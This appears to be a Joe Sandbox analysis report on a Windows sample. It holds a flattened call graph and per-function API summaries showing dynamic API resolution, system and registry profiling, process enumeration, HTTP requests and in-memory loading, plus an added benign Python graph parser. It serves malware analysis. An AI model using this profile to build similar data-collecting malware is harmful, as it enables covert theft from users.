14256->14257 14258 eb38c5 14257->14258 
14259 eb45c0 2 API calls 14258->14259 14260 eb38de 14259->14260 14261 eb45c0 2 API calls 14260->14261 14262 eb38f7 14261->14262 14263 eb45c0 2 API calls 14262->14263 14264 eb3910 14263->14264 14265 eb45c0 2 API calls 14264->14265 14266 eb3929 14265->14266 14267 eb45c0 2 API calls 14266->14267 14268 eb3942 14267->14268 14269 eb45c0 2 API calls 14268->14269 14270 eb395b 14269->14270 14271 eb45c0 2 API calls 14270->14271 14272 eb3974 14271->14272 14273 eb45c0 2 API calls 14272->14273 14274 eb398d 14273->14274 14275 eb45c0 2 API calls 14274->14275 14276 eb39a6 14275->14276 14277 eb45c0 2 API calls 14276->14277 14278 eb39bf 14277->14278 14279 eb45c0 2 API calls 14278->14279 14280 eb39d8 14279->14280 14281 eb45c0 2 API calls 14280->14281 14282 eb39f1 14281->14282 14283 eb45c0 2 API calls 14282->14283 14284 eb3a0a 14283->14284 14285 eb45c0 2 API calls 14284->14285 14286 eb3a23 14285->14286 14287 eb45c0 2 API calls 14286->14287 14288 eb3a3c 14287->14288 14289 eb45c0 2 API calls 14288->14289 14290 eb3a55 14289->14290 14291 eb45c0 2 API calls 14290->14291 14292 eb3a6e 14291->14292 14293 eb45c0 2 API calls 14292->14293 14294 eb3a87 14293->14294 14295 eb45c0 2 API calls 14294->14295 14296 eb3aa0 14295->14296 14297 eb45c0 2 API calls 14296->14297 14298 eb3ab9 14297->14298 14299 eb45c0 2 API calls 14298->14299 14300 eb3ad2 14299->14300 14301 eb45c0 2 API calls 14300->14301 14302 eb3aeb 14301->14302 14303 eb45c0 2 API calls 14302->14303 14304 eb3b04 14303->14304 14305 eb45c0 2 API calls 14304->14305 14306 eb3b1d 14305->14306 14307 eb45c0 2 API calls 14306->14307 14308 eb3b36 14307->14308 14309 eb45c0 2 API calls 14308->14309 14310 eb3b4f 14309->14310 14311 eb45c0 2 API calls 14310->14311 14312 eb3b68 14311->14312 14313 eb45c0 2 API calls 14312->14313 14314 eb3b81 14313->14314 14315 eb45c0 2 API calls 14314->14315 14316 eb3b9a 14315->14316 14317 eb45c0 2 API calls 14316->14317 14318 eb3bb3 14317->14318 14319 eb45c0 2 API calls 14318->14319 14320 eb3bcc 14319->14320 14321 eb45c0 2 
API calls 14320->14321 14322 eb3be5 14321->14322 14323 eb45c0 2 API calls 14322->14323 14324 eb3bfe 14323->14324 14325 eb45c0 2 API calls 14324->14325 14326 eb3c17 14325->14326 14327 eb45c0 2 API calls 14326->14327 14328 eb3c30 14327->14328 14329 eb45c0 2 API calls 14328->14329 14330 eb3c49 14329->14330 14331 eb45c0 2 API calls 14330->14331 14332 eb3c62 14331->14332 14333 eb45c0 2 API calls 14332->14333 14334 eb3c7b 14333->14334 14335 eb45c0 2 API calls 14334->14335 14336 eb3c94 14335->14336 14337 eb45c0 2 API calls 14336->14337 14338 eb3cad 14337->14338 14339 eb45c0 2 API calls 14338->14339 14340 eb3cc6 14339->14340 14341 eb45c0 2 API calls 14340->14341 14342 eb3cdf 14341->14342 14343 eb45c0 2 API calls 14342->14343 14344 eb3cf8 14343->14344 14345 eb45c0 2 API calls 14344->14345 14346 eb3d11 14345->14346 14347 eb45c0 2 API calls 14346->14347 14348 eb3d2a 14347->14348 14349 eb45c0 2 API calls 14348->14349 14350 eb3d43 14349->14350 14351 eb45c0 2 API calls 14350->14351 14352 eb3d5c 14351->14352 14353 eb45c0 2 API calls 14352->14353 14354 eb3d75 14353->14354 14355 eb45c0 2 API calls 14354->14355 14356 eb3d8e 14355->14356 14357 eb45c0 2 API calls 14356->14357 14358 eb3da7 14357->14358 14359 eb45c0 2 API calls 14358->14359 14360 eb3dc0 14359->14360 14361 eb45c0 2 API calls 14360->14361 14362 eb3dd9 14361->14362 14363 eb45c0 2 API calls 14362->14363 14364 eb3df2 14363->14364 14365 eb45c0 2 API calls 14364->14365 14366 eb3e0b 14365->14366 14367 eb45c0 2 API calls 14366->14367 14368 eb3e24 14367->14368 14369 eb45c0 2 API calls 14368->14369 14370 eb3e3d 14369->14370 14371 eb45c0 2 API calls 14370->14371 14372 eb3e56 14371->14372 14373 eb45c0 2 API calls 14372->14373 14374 eb3e6f 14373->14374 14375 eb45c0 2 API calls 14374->14375 14376 eb3e88 14375->14376 14377 eb45c0 2 API calls 14376->14377 14378 eb3ea1 14377->14378 14379 eb45c0 2 API calls 14378->14379 14380 eb3eba 14379->14380 14381 eb45c0 2 API calls 14380->14381 14382 eb3ed3 14381->14382 14383 eb45c0 2 API calls 
14382->14383 14384 eb3eec 14383->14384 14385 eb45c0 2 API calls 14384->14385 14386 eb3f05 14385->14386 14387 eb45c0 2 API calls 14386->14387 14388 eb3f1e 14387->14388 14389 eb45c0 2 API calls 14388->14389 14390 eb3f37 14389->14390 14391 eb45c0 2 API calls 14390->14391 14392 eb3f50 14391->14392 14393 eb45c0 2 API calls 14392->14393 14394 eb3f69 14393->14394 14395 eb45c0 2 API calls 14394->14395 14396 eb3f82 14395->14396 14397 eb45c0 2 API calls 14396->14397 14398 eb3f9b 14397->14398 14399 eb45c0 2 API calls 14398->14399 14400 eb3fb4 14399->14400 14401 eb45c0 2 API calls 14400->14401 14402 eb3fcd 14401->14402 14403 eb45c0 2 API calls 14402->14403 14404 eb3fe6 14403->14404 14405 eb45c0 2 API calls 14404->14405 14406 eb3fff 14405->14406 14407 eb45c0 2 API calls 14406->14407 14408 eb4018 14407->14408 14409 eb45c0 2 API calls 14408->14409 14410 eb4031 14409->14410 14411 eb45c0 2 API calls 14410->14411 14412 eb404a 14411->14412 14413 eb45c0 2 API calls 14412->14413 14414 eb4063 14413->14414 14415 eb45c0 2 API calls 14414->14415 14416 eb407c 14415->14416 14417 eb45c0 2 API calls 14416->14417 14418 eb4095 14417->14418 14419 eb45c0 2 API calls 14418->14419 14420 eb40ae 14419->14420 14421 eb45c0 2 API calls 14420->14421 14422 eb40c7 14421->14422 14423 eb45c0 2 API calls 14422->14423 14424 eb40e0 14423->14424 14425 eb45c0 2 API calls 14424->14425 14426 eb40f9 14425->14426 14427 eb45c0 2 API calls 14426->14427 14428 eb4112 14427->14428 14429 eb45c0 2 API calls 14428->14429 14430 eb412b 14429->14430 14431 eb45c0 2 API calls 14430->14431 14432 eb4144 14431->14432 14433 eb45c0 2 API calls 14432->14433 14434 eb415d 14433->14434 14435 eb45c0 2 API calls 14434->14435 14436 eb4176 14435->14436 14437 eb45c0 2 API calls 14436->14437 14438 eb418f 14437->14438 14439 eb45c0 2 API calls 14438->14439 14440 eb41a8 14439->14440 14441 eb45c0 2 API calls 14440->14441 14442 eb41c1 14441->14442 14443 eb45c0 2 API calls 14442->14443 14444 eb41da 14443->14444 14445 eb45c0 2 API calls 14444->14445 
14446 eb41f3 14445->14446 14447 eb45c0 2 API calls 14446->14447 14448 eb420c 14447->14448 14449 eb45c0 2 API calls 14448->14449 14450 eb4225 14449->14450 14451 eb45c0 2 API calls 14450->14451 14452 eb423e 14451->14452 14453 eb45c0 2 API calls 14452->14453 14454 eb4257 14453->14454 14455 eb45c0 2 API calls 14454->14455 14456 eb4270 14455->14456 14457 eb45c0 2 API calls 14456->14457 14458 eb4289 14457->14458 14459 eb45c0 2 API calls 14458->14459 14460 eb42a2 14459->14460 14461 eb45c0 2 API calls 14460->14461 14462 eb42bb 14461->14462 14463 eb45c0 2 API calls 14462->14463 14464 eb42d4 14463->14464 14465 eb45c0 2 API calls 14464->14465 14466 eb42ed 14465->14466 14467 eb45c0 2 API calls 14466->14467 14468 eb4306 14467->14468 14469 eb45c0 2 API calls 14468->14469 14470 eb431f 14469->14470 14471 eb45c0 2 API calls 14470->14471 14472 eb4338 14471->14472 14473 eb45c0 2 API calls 14472->14473 14474 eb4351 14473->14474 14475 eb45c0 2 API calls 14474->14475 14476 eb436a 14475->14476 14477 eb45c0 2 API calls 14476->14477 14478 eb4383 14477->14478 14479 eb45c0 2 API calls 14478->14479 14480 eb439c 14479->14480 14481 eb45c0 2 API calls 14480->14481 14482 eb43b5 14481->14482 14483 eb45c0 2 API calls 14482->14483 14484 eb43ce 14483->14484 14485 eb45c0 2 API calls 14484->14485 14486 eb43e7 14485->14486 14487 eb45c0 2 API calls 14486->14487 14488 eb4400 14487->14488 14489 eb45c0 2 API calls 14488->14489 14490 eb4419 14489->14490 14491 eb45c0 2 API calls 14490->14491 14492 eb4432 14491->14492 14493 eb45c0 2 API calls 14492->14493 14494 eb444b 14493->14494 14495 eb45c0 2 API calls 14494->14495 14496 eb4464 14495->14496 14497 eb45c0 2 API calls 14496->14497 14498 eb447d 14497->14498 14499 eb45c0 2 API calls 14498->14499 14500 eb4496 14499->14500 14501 eb45c0 2 API calls 14500->14501 14502 eb44af 14501->14502 14503 eb45c0 2 API calls 14502->14503 14504 eb44c8 14503->14504 14505 eb45c0 2 API calls 14504->14505 14506 eb44e1 14505->14506 14507 eb45c0 2 API calls 14506->14507 14508 eb44fa 
14507->14508 14509 eb45c0 2 API calls 14508->14509 14510 eb4513 14509->14510 14511 eb45c0 2 API calls 14510->14511 14512 eb452c 14511->14512 14513 eb45c0 2 API calls 14512->14513 14514 eb4545 14513->14514 14515 eb45c0 2 API calls 14514->14515 14516 eb455e 14515->14516 14517 eb45c0 2 API calls 14516->14517 14518 eb4577 14517->14518 14519 eb45c0 2 API calls 14518->14519 14520 eb4590 14519->14520 14521 eb45c0 2 API calls 14520->14521 14522 eb45a9 14521->14522 14523 ec9c10 14522->14523 14524 eca036 8 API calls 14523->14524 14525 ec9c20 43 API calls 14523->14525 14526 eca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14526 14527 eca146 14524->14527 14525->14524 14526->14527 14528 eca216 14527->14528 14529 eca153 8 API calls 14527->14529 14530 eca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 eca298 14528->14531 14529->14528 14530->14531 14532 eca2a5 6 API calls 14531->14532 14533 eca337 14531->14533 14532->14533 14534 eca41f 14533->14534 14535 eca344 9 API calls 14533->14535 14536 eca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 eca4a2 14534->14537 14535->14534 14536->14537 14538 eca4dc 14537->14538 14539 eca4ab GetProcAddress GetProcAddress 14537->14539 14540 eca515 14538->14540 14541 eca4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 eca612 14540->14542 14543 eca522 10 API calls 14540->14543 14541->14540 14544 eca67d 14542->14544 14545 eca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 eca69e 14544->14546 14547 eca686 GetProcAddress 14544->14547 14545->14544 14548 ec5ca3 14546->14548 14549 eca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 eb1590 14548->14550 14549->14548 15671 eb1670 14550->15671 14553 eca7a0 lstrcpy 14554 eb15b5 14553->14554 14555 eca7a0 lstrcpy 14554->14555 14556 eb15c7 14555->14556 14557 eca7a0 
lstrcpy 14556->14557 14558 eb15d9 14557->14558 14559 eca7a0 lstrcpy 14558->14559 14560 eb1663 14559->14560 14561 ec5510 14560->14561 14562 ec5521 14561->14562 14563 eca820 2 API calls 14562->14563 14564 ec552e 14563->14564 14565 eca820 2 API calls 14564->14565 14566 ec553b 14565->14566 14567 eca820 2 API calls 14566->14567 14568 ec5548 14567->14568 14569 eca740 lstrcpy 14568->14569 14570 ec5555 14569->14570 14571 eca740 lstrcpy 14570->14571 14572 ec5562 14571->14572 14573 eca740 lstrcpy 14572->14573 14574 ec556f 14573->14574 14575 eca740 lstrcpy 14574->14575 14614 ec557c 14575->14614 14576 ec52c0 25 API calls 14576->14614 14577 ec5643 StrCmpCA 14577->14614 14578 ec56a0 StrCmpCA 14579 ec57dc 14578->14579 14578->14614 14580 eca8a0 lstrcpy 14579->14580 14581 ec57e8 14580->14581 14584 eca820 2 API calls 14581->14584 14582 eca740 lstrcpy 14582->14614 14583 eca820 lstrlen lstrcpy 14583->14614 14585 ec57f6 14584->14585 14587 eca820 2 API calls 14585->14587 14586 ec5856 StrCmpCA 14588 ec5991 14586->14588 14586->14614 14589 ec5805 14587->14589 14590 eca8a0 lstrcpy 14588->14590 14591 eb1670 lstrcpy 14589->14591 14592 ec599d 14590->14592 14613 ec5811 14591->14613 14593 eca820 2 API calls 14592->14593 14594 ec59ab 14593->14594 14596 eca820 2 API calls 14594->14596 14595 ec5a0b StrCmpCA 14597 ec5a28 14595->14597 14598 ec5a16 Sleep 14595->14598 14600 ec59ba 14596->14600 14601 eca8a0 lstrcpy 14597->14601 14598->14614 14599 eca7a0 lstrcpy 14599->14614 14602 eb1670 lstrcpy 14600->14602 14603 ec5a34 14601->14603 14602->14613 14605 eca820 2 API calls 14603->14605 14604 eb1590 lstrcpy 14604->14614 14606 ec5a43 14605->14606 14608 eca820 2 API calls 14606->14608 14607 ec51f0 20 API calls 14607->14614 14610 ec5a52 14608->14610 14609 ec578a StrCmpCA 14609->14614 14611 eb1670 lstrcpy 14610->14611 14611->14613 14612 ec593f StrCmpCA 14612->14614 14613->13668 14614->14576 14614->14577 14614->14578 14614->14582 14614->14583 14614->14586 14614->14595 14614->14599 14614->14604 14614->14607 
14614->14609 14614->14612 14615 eca8a0 lstrcpy 14614->14615 14615->14614 14617 ec754c 14616->14617 14618 ec7553 GetVolumeInformationA 14616->14618 14617->14618 14619 ec7591 14618->14619 14620 ec75fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 ec7628 wsprintfA 14620->14621 14622 ec7619 14620->14622 14624 eca740 lstrcpy 14621->14624 14623 eca740 lstrcpy 14622->14623 14625 ec5da7 14623->14625 14624->14625 14625->13689 14627 eca7a0 lstrcpy 14626->14627 14628 eb4899 14627->14628 15680 eb47b0 14628->15680 14630 eb48a5 14631 eca740 lstrcpy 14630->14631 14632 eb48d7 14631->14632 14633 eca740 lstrcpy 14632->14633 14634 eb48e4 14633->14634 14635 eca740 lstrcpy 14634->14635 14636 eb48f1 14635->14636 14637 eca740 lstrcpy 14636->14637 14638 eb48fe 14637->14638 14639 eca740 lstrcpy 14638->14639 14640 eb490b InternetOpenA StrCmpCA 14639->14640 14641 eb4944 14640->14641 14642 eb4ecb InternetCloseHandle 14641->14642 15686 ec8b60 14641->15686 14644 eb4ee8 14642->14644 15701 eb9ac0 CryptStringToBinaryA 14644->15701 14645 eb4963 15694 eca920 14645->15694 14648 eb4976 14650 eca8a0 lstrcpy 14648->14650 14655 eb497f 14650->14655 14651 eca820 2 API calls 14652 eb4f05 14651->14652 14654 eca9b0 4 API calls 14652->14654 14653 eb4f27 ctype 14658 eca7a0 lstrcpy 14653->14658 14656 eb4f1b 14654->14656 14659 eca9b0 4 API calls 14655->14659 14657 eca8a0 lstrcpy 14656->14657 14657->14653 14670 eb4f57 14658->14670 14660 eb49a9 14659->14660 14661 eca8a0 lstrcpy 14660->14661 14662 eb49b2 14661->14662 14663 eca9b0 4 API calls 14662->14663 14664 eb49d1 14663->14664 14665 eca8a0 lstrcpy 14664->14665 14666 eb49da 14665->14666 14667 eca920 3 API calls 14666->14667 14668 eb49f8 14667->14668 14669 eca8a0 lstrcpy 14668->14669 14671 eb4a01 14669->14671 14670->13692 14672 eca9b0 4 API calls 14671->14672 14673 eb4a20 14672->14673 14674 eca8a0 lstrcpy 14673->14674 14675 eb4a29 14674->14675 14676 eca9b0 4 API calls 14675->14676 14677 eb4a48 14676->14677 14678 eca8a0 lstrcpy 14677->14678 14679 eb4a51 
Control-flow graph data (the interactive call graph of the original report, flattened to node ids and edges; not readable as text). The functions and the APIs the graph attributes to them:
• eb4a7d-eb4ebe (HTTP request routine): string assembly through the eca740/eca7a0/eca8a0/eca920/eca9b0 helpers (lstrcpy, lstrcat, lstrlen), then InternetConnectA (eb4aa3), HttpOpenRequestA (eb4ad3), lstrlen (eb4de7, eb4e03), HttpSendRequestA (eb4e13), an InternetReadFile loop (eb4e32/eb4e5e) and InternetCloseHandle (eb4e67, eb4ebe).
• ec17c4-ec19c2: a chain of StrCmpCA comparisons (ec17c4, ec185d, ec187f, ec18ad, ec18cf, ec18f1, ec1913, ec1932, ec1951, ec1970) around an lstrlen/lstrcpy loop (eca820); the first comparison branches to ExitProcess (ec17cf).
• eb5979-eb604f (second HTTP request routine): eb47b0 (lstrlen, InternetCrackUrlA at eb4848), InternetOpenA + StrCmpCA (eb59ee), GetSystemTime (ec8b60), InternetConnectA (eb5b7c), HttpOpenRequestA (eb5bac), lstrlen (eb5e70-eb5f1a), GetProcessHeap/RtlAllocateHeap (eb5e81), HttpSendRequestA (eb5f2a), an InternetReadFile loop (eb5f35/eb5f61), InternetCloseHandle (eb5f6a, eb5fb6, eb5fc3), then eb9ac0: LocalAlloc (eb9af9), CryptStringToBinaryA (eb9b14), LocalFree (eb9b39).
• ec0db7-ec0f17, ec0f67-ec1044 and ec1077-ec1151: StrCmpCA against fixed strings (ec0e27, ec0e67, ec0ea4, ec0fb2) with eca820 lstrlen/lstrcpy loops.
• ec1a26-ec2699 (system-information collection; each value is appended with the eca9b0/eca8a0 helpers): ec7500 (6 API calls); ec7690 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey (and ec7720 with the same calls); ec77c0 GetCurrentProcess, IsWow64Process; ec7850 and ec78e0 (3 API calls each); ec7980 GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA; ec7a30 GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA; ec7b00 GetUserDefaultLocaleName, then ec8d20 LocalAlloc, CharToOemW; ec7b90 GetKeyboardLayoutList (twice), LocalAlloc, a GetLocaleInfoA loop, LocalFree; ec7d80 GetSystemPowerStatus; GetCurrentProcessId (ec207e), then ec9470 OpenProcess, GetModuleFileNameExA, CloseHandle; ec7e00 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey; ec7f60 GetLogicalProcessorInformationEx, GetLastError, ec8a10 (GetProcessHeap, RtlAllocateHeap), ec89f0 (GetProcessHeap, HeapFree), wsprintfA; ec7ed0 GetSystemInfo, wsprintfA; ec8100 GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, __aulldiv, wsprintfA; ec87c0 GetProcessHeap, RtlAllocateHeap, wsprintfA; ec81f0 (string assembly only); ec8320 (called from ec24b7 and ec254c, 17 API calls) RegOpenKeyExA, a RegEnumKeyExA loop, wsprintfA, RegOpenKeyExA, RegQueryValueExA (twice), lstrlen, RegCloseKey; ec8680 CreateToolhelp32Snapshot, Process32First, a Process32Next loop, CloseHandle; lstrlen (ec265a); then ec5190, which calls eb5100.
• eb5100-eb5913 (third HTTP request routine): eb47b0 (lstrlen, InternetCrackUrlA), ec8ea0 CryptBinaryToStringA twice with GetProcessHeap/RtlAllocateHeap in between, InternetOpenA + StrCmpCA (eb51fd), GetSystemTime (ec8b60), InternetConnectA (eb5329), HttpOpenRequestA (eb5359), InternetCloseHandle (eb58b7, eb58c4).
• eb5009-eb50ec: InternetOpenUrlA, an InternetReadFile loop (eb502a), InternetCloseHandle twice (eb50a0).
• ec0759-ec0a49: a StrCmpCA dispatcher (ec0799, ec0865, ec099c) reaching ebfb00 and ec0250 (ec8de0, 2 API calls), with the eca740/eca7a0/eb1590 lstrcpy helpers.
• eb98d0, via eb9880 and eb6fb0, to eb6d40: eb6530 (ec8a10 GetProcessHeap/RtlAllocateHeap, VirtualAlloc at eb668f and eb6743), eb69b0 (LoadLibraryA at eb6a09, a GetProcAddress loop at eb6ba8, ec8a10/ec89f0 heap calls), then VirtualFree (eb6ee6), FreeLibrary (eb6f26) and ec89f0 GetProcessHeap/HeapFree.
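The graph text above is the report's interactive call graph flattened to a token stream of node ids, addresses, labels and "src->dst" edges. As an added example that is not part of the Joe Sandbox report, the following Python parses that stream (a constructed excerpt of the eb4a7d HTTP routine, abridged so that it stays short) and walks it to recover the order of API calls reachable from a basic block; the node ids, addresses and labels are the report's own, the function names and the breadth-first walk are mine.

```python
import re
from collections import defaultdict

# Constructed excerpt of the report's flattened control-flow graph (abridged from
# the eb4a7d HTTP routine above); node ids, addresses and labels are the report's.
GRAPH_TEXT = (
    "14684 eca8a0 lstrcpy 14683->14684 14685 eb4a8d 14684->14685 "
    "14686 eb4aa3 InternetConnectA 14685->14686 14686->14642 "
    "14687 eb4ad3 HttpOpenRequestA 14686->14687 14689 eb4b28 14687->14689 "
    "14690 eb4ebe InternetCloseHandle 14687->14690 14690->14642 "
    "14691 eca9b0 4 API calls 14689->14691 "
    "14761 eb4e03 lstrlen 14760->14761 15700 ecaad0 14761->15700 "
    "14763 eb4e13 HttpSendRequestA 14764 eb4e32 InternetReadFile 14763->14764 "
    "14765 eb4e67 InternetCloseHandle 14764->14765 14770 eb4e5e 14764->14770 "
    "14770->14764 14770->14765 15700->14763"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")                    # "src->dst"
ADDR = re.compile(r"^[0-9a-f]{6}(-[0-9a-f]{6})?$")      # "eb4aa3" or "ec9860-ec9874"


def parse_graph(text):
    """Split the token stream into nodes {id: (addr, label)} and edges [(src, dst)].

    A node is a decimal id followed by a hex address; every token up to the next
    node or edge belongs to its label ("InternetConnectA", "4 API calls", ...).
    """
    nodes, edges, cur = {}, [], None
    toks = text.split()
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None                     # label tokens never follow an edge
        elif tok.isdigit() and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = int(tok)
            nodes[cur] = [toks[i + 1], []]
            i += 1                         # consume the address token
        elif cur is not None:
            nodes[cur][1].append(tok)      # "4", "API", "calls" -> "4 API calls"
        i += 1
    return {n: (addr, " ".join(label)) for n, (addr, label) in nodes.items()}, edges


def api_sequence(nodes, edges, start):
    """Breadth-first walk from `start` in edge order; return the labels of the
    labelled nodes reached (unlabelled nodes are plain basic blocks). Back edges
    such as the InternetReadFile loop are handled by the visited set."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, queue, out = {start}, [start], []
    while queue:
        n = queue.pop(0)
        _addr, label = nodes.get(n, ("?", ""))   # targets outside the excerpt are unlabelled
        if label:
            out.append(label)
        for dst in succ[n]:
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return out


if __name__ == "__main__":
    nodes, edges = parse_graph(GRAPH_TEXT)
    print(len(nodes), "nodes,", len(edges), "edges")
    print("from eb4aa3:", api_sequence(nodes, edges, 14686))
    print("from eb4e03:", api_sequence(nodes, edges, 14761))
```

Run against the full dump, the same two functions give the WinINet order per routine (InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle) without reading the edge list by hand; the excerpt omits the eb4b28-eb4dfa string-building blocks, so the walk from eb4aa3 stops at the "4 API calls" helper node.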

Control-flow Graph

Graph data (rendered as a graph in the original report): ec9860-ec9874 calls ec9750, then either ec987a-ec9a8e (call ec9780, GetProcAddress × 21) or directly ec9a93-ec9af2 (LoadLibraryA × 5); after that, five further GetProcAddress blocks, each behind a conditional branch (ec9af4-ec9b08; ec9b16-ec9b41, × 2; ec9b4f-ec9b63; ec9b71-ec9b84; ec9b92-ec9bbc, × 2), ending at ec9bc1-ec9bc2.
                            APIs
                            • GetProcAddress.KERNEL32(76F70000,00A90660), ref: 00EC98A1
                            • GetProcAddress.KERNEL32(76F70000,00A907E0), ref: 00EC98BA
                            • GetProcAddress.KERNEL32(76F70000,00A906A8), ref: 00EC98D2
                            • GetProcAddress.KERNEL32(76F70000,00A907C8), ref: 00EC98EA
                            • GetProcAddress.KERNEL32(76F70000,00A90768), ref: 00EC9903
                            • GetProcAddress.KERNEL32(76F70000,00A98B28), ref: 00EC991B
                            • GetProcAddress.KERNEL32(76F70000,00A86240), ref: 00EC9933
                            • GetProcAddress.KERNEL32(76F70000,00A861E0), ref: 00EC994C
                            • GetProcAddress.KERNEL32(76F70000,00A906D8), ref: 00EC9964
                            • GetProcAddress.KERNEL32(76F70000,00A90570), ref: 00EC997C
                            • GetProcAddress.KERNEL32(76F70000,00A90588), ref: 00EC9995
                            • GetProcAddress.KERNEL32(76F70000,00A906F0), ref: 00EC99AD
                            • GetProcAddress.KERNEL32(76F70000,00A86480), ref: 00EC99C5
                            • GetProcAddress.KERNEL32(76F70000,00A90708), ref: 00EC99DE
                            • GetProcAddress.KERNEL32(76F70000,00A90750), ref: 00EC99F6
                            • GetProcAddress.KERNEL32(76F70000,00A863C0), ref: 00EC9A0E
                            • GetProcAddress.KERNEL32(76F70000,00A90780), ref: 00EC9A27
                            • GetProcAddress.KERNEL32(76F70000,00A90828), ref: 00EC9A3F
                            • GetProcAddress.KERNEL32(76F70000,00A86260), ref: 00EC9A57
                            • GetProcAddress.KERNEL32(76F70000,00A90810), ref: 00EC9A70
                            • GetProcAddress.KERNEL32(76F70000,00A86200), ref: 00EC9A88
                            • LoadLibraryA.KERNEL32(00A908D0,?,00EC6A00), ref: 00EC9A9A
                            • LoadLibraryA.KERNEL32(00A908B8,?,00EC6A00), ref: 00EC9AAB
                            • LoadLibraryA.KERNEL32(00A90840,?,00EC6A00), ref: 00EC9ABD
                            • LoadLibraryA.KERNEL32(00A90858,?,00EC6A00), ref: 00EC9ACF
                            • LoadLibraryA.KERNEL32(00A90870,?,00EC6A00), ref: 00EC9AE0
                            • GetProcAddress.KERNEL32(76DA0000,00A90888), ref: 00EC9B02
                            • GetProcAddress.KERNEL32(75840000,00A908A0), ref: 00EC9B23
                            • GetProcAddress.KERNEL32(75840000,00A98F10), ref: 00EC9B3B
                            • GetProcAddress.KERNEL32(753A0000,00A98F28), ref: 00EC9B5D
                            • GetProcAddress.KERNEL32(77300000,00A86580), ref: 00EC9B7E
                            • GetProcAddress.KERNEL32(774D0000,00A98AA8), ref: 00EC9B9F
                            • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00EC9BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00EC9BAA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: c39025a9f0a16da9e4d1375d4e59fd52fffa7723fdc454d260c3815cae0b6ff2
                            • Instruction ID: 4e58f190b9978df0907f180040ffb3aed2576488b51b223eb8decdfabf22b138
                            • Opcode Fuzzy Hash: c39025a9f0a16da9e4d1375d4e59fd52fffa7723fdc454d260c3815cae0b6ff2
                            • Instruction Fuzzy Hash: A2A12EB5700241DFD364DBA9E98AE5637F9F78C341B04851EA68E83A4CD77FA442CB60

Control-flow Graph (the rendered graph, which colours blocks as executed or not executed, is not included in this extraction; blocks and edges as extracted follow)
                            control_flow_graph 764 eb45c0-eb4695 RtlAllocateHeap 781 eb46a0-eb46a6 764->781 782 eb474f-eb47a9 VirtualProtect 781->782 783 eb46ac-eb474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EB479C
                            Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 00EB45C7, 00EB45D2, 00EB45DD, 00EB45E8, 00EB45F3, 00EB4617, 00EB4622, 00EB462D, 00EB4638, 00EB4643, 00EB4657, 00EB4662, 00EB466D, 00EB4678, 00EB4683, 00EB46AC, 00EB46B7, 00EB46C2, 00EB46CD, 00EB46D8, 00EB4713, 00EB471E, 00EB4729, 00EB4734, 00EB473F, 00EB474F, 00EB475A, 00EB4765, 00EB4770, 00EB477B
(the references come in runs of five sites spaced 0xB bytes apart, which is consistent with inserted junk instructions that merely reference a decoy string rather than with the function using it)
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: the same 14 dump regions (0000000000EB0000 through 0000000001551000) as listed under the first function above
                            Joe Sandbox IDA Plugin
